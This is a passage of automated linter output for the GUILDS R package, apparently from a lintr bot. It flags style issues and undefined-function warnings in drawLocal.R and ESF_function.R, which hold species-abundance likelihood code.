~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n^\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                 ~^~\n```\n[R/drawLocal.R:47:39:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                      ^\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        y = k1 * res, \n^\n```\n[R/drawLocal.R:48:35:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        y = k1 * res, \n                                  ^~\n```\n[R/drawLocal.R:48:39:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        y = k1 * res, \n                                      ^\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        xi = log2(k2), \n^\n```\n[R/drawLocal.R:49:36:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        xi = log2(k2), \n                                  ~^~\n```\n[R/drawLocal.R:49:40:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        xi = log2(k2), \n                                       ^\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        method = \"spline\")\n^\n```\n[R/drawLocal.R:50:40:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        method = \"spline\")\n                                      ~^~\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:52:14:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:53:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:53:13:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:54:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:54:17:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:55:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:61:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L61) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:62:42:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:69:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:69:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:69:14:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:69:16:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:69:17:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:71:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:71:28:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:71:31:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:71:37:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:73:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:73:28:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:73:31:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:73:37:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:77:17:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L77) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:79:29:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           ~^~\n```\n[R/drawLocal.R:83:13:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:90:9:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L90) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:94:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L94) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:95:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L95) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:97:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L97) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:98:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L98) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:109:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L109) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/drawLocal.R:109:66:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L109) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/drawLocal.R:110:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L110) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:113:3:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:114:5:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L114) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/drawLocal.R:115:28:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L115) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/drawLocal.R:115:33:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L115) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/drawLocal.R:116:27:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L116) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  (lgamma(allN + 1) + \n                          ^~~~\n```\n[R/drawLocal.R:116:38:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L116) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(allN + 1) + \n                                     ^\n```\n[R/drawLocal.R:117:30:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L117) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/drawLocal.R:117:42:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L117) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/drawLocal.R:118:21:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    allN * log(nx) + \n                    ^~~~\n```\n[R/drawLocal.R:118:37:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L118) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    allN * log(nx) + \n                                    ^\n```\n[R/drawLocal.R:119:23:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L119) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-allN) * log(ny))\n                     ~^~\n```\n[R/drawLocal.R:119:24:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    (J-allN) * log(ny))\n                       ^~~~\n```\n[R/drawLocal.R:121:14:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L121) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN)\n             ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:121:44:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                           ^~~~\n```\n[R/drawLocal.R:127:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L127) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:128:11:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/drawLocal.R#L128) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:10:14:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L12) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L12) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:14:13:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L14) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:19:22:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L19) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -1 * ( sum(log(abund)) + sum(lgamma(1 + freq_x)))\n                     ^\n```\n[R/ESF_function.R:22:22:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1\n                    ~^~\n```\n[R/ESF_function.R:24:15:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:44:13:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L44) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose=TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/50e2e0a187ed77b36f22bf4fa136bb73751b9231/R/ESF_function.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         